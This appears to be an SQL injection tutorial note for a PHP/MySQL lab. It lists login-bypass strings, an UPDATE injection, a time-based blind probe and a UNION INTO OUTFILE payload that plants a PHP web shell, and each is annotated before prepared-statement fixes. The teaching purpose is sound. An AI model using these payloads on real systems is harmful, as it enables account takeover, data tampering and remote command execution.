a'# | 用户a登录 (logs in as user a: the quote closes the string literal and `#` comments out the rest of the WHERE clause, including the password check) |
a' or 1# | |
a' or 1=1# | |
a' and 1;# | |
d' or 1# | |
a' or '1 | (no comment marker: the query's own trailing quote closes the injected literal) |
b' or 0;# | 用户b登录 (logs in as user b) |
a', Coins=100 where Username='a' ;# | (UPDATE injection: the input supplies both the SET list and the WHERE clause) |
c' union select 1,1,1,1,1,1,if(substring(database(),1,1)=char(119),benchmark(5000000,encode('aaa','bbbb')),NULL);# | (time-based blind probe: a correct guess of the first character of the database name costs a measurable delay; the original line was missing the closing parenthesis of benchmark(). encode() was removed in MySQL 8.0, so on newer servers any sufficiently slow expression takes its place) |
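<?php
// --- Vulnerable pattern -----------------------------------------------------
// $username / $password come straight from the request and are spliced into the
// SQL text. A single quote in the input closes the literal, whatever follows is
// parsed as SQL, and `#` comments out the remainder of the original query.
$sql = "select * from Person where Username = '$username' and Password = '$password'";
// With $username = "a' or 1#" the server receives
//   select * from Person where Username = 'a' or 1# ' and Password = '...'
// The password comparison sits inside the comment, so user a's row is returned.

// Same defect on an UPDATE. The original listing also had a PHP syntax error here
// (two adjacent string literals with no `.` operator and no space before WHERE).
$sql = "UPDATE Person SET Profile = '$profile' WHERE PersonID = '$personID'";
// With $profile = "b',zoobars=100 where Username='b';#" the statement becomes
//   UPDATE Person SET Profile = 'b',zoobars=100 where Username='b';# ' WHERE PersonID = '...'
// i.e. the attacker chooses both the SET list and the WHERE clause.

// UNION: both SELECTs execute, and the injected one must produce the same number
// of columns as the first (six here). The if()/benchmark() pair turns a guess
// about the first character of the database name (char(119) = 'w') into a
// measurable delay -- a time-based blind probe. (encode() was removed in
// MySQL 8.0; any sufficiently slow expression plays the same role there.)
$sql = "select * from Person where Username = 'c' union select 1,1,1,1,1,1, if(substring(database(),1,1)=char(119), benchmark(5000000, encode('aaa','bbbb')), NULL);# ' and Password = '$password'";

// UNION ... INTO OUTFILE: the selected row is written to a file on the DB host.
// Preconditions named on the page: the web root path is known, the MySQL account
// has the FILE privilege, and the directory is writable by the mysqld process.
// (secure_file_priv may additionally restrict the destination -- check the target.)
// `\$_GET` is escaped so PHP does not interpolate the request parameter while
// building the string; the original also used `"` inside a `"`-quoted string.
$sql = "select * from Person where Username = 'd' union select 1,1,1,1,1,1,'<?php system(\$_GET[cmd]);?>' into outfile '/home/web/WebSec/1.php';# ' and Password = '$password'";

// --- Fix: prepared statements -----------------------------------------------
// Values are bound through placeholders and sent separately from the statement
// text, so the input can never change the SQL structure. mysqli::bind_param
// type codes: "s" = string, "i" = integer. Only values can be bound; table and
// column names must be validated against a fixed allow-list instead.
$stmt = $db->prepare("SELECT * FROM users WHERE name = ? AND age = ?");
if ($stmt === false) {
    throw new RuntimeException("prepare failed: " . $db->error);
}
$stmt->bind_param("si", $user, $age);
$stmt->execute();

// The same treatment applied to the two vulnerable Person queries above.
// (Comparing a plaintext password column is a separate problem not covered here.)
$stmt = $db->prepare("SELECT * FROM Person WHERE Username = ? AND Password = ?");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();

$stmt = $db->prepare("UPDATE Person SET Profile = ? WHERE PersonID = ?");
$stmt->bind_param("ss", $profile, $personID);
$stmt->execute();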
原文地址:https://www.cnblogs.com/tianjiazhen/p/12235930.html